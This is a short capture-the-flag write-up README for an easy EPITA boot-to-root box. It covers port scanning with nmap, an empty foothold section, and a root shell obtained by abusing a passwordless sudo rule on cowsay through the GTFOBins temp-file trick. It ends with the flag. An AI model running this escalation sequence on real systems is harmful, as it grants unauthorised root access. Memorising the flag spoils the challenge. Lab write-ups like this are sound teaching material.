ctf-chal-ji/README.md

JI EPITA - CTF

Challenge Type : boot to root (box)

Difficulty : easy

---

Writeup

Enum

Scan the IP using nmap for open ports

nmap -p- ip

The port 22 and 31337 are open.

We find that there is a web service on port 31337.

Foothold

...

Privesc

We can see that the user is allowed tu run /usr/games/cowsay as root using sudo without password.

User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l

Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.

https://gtfobins.github.io/gtfobins/cowsay/

TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}

Solved !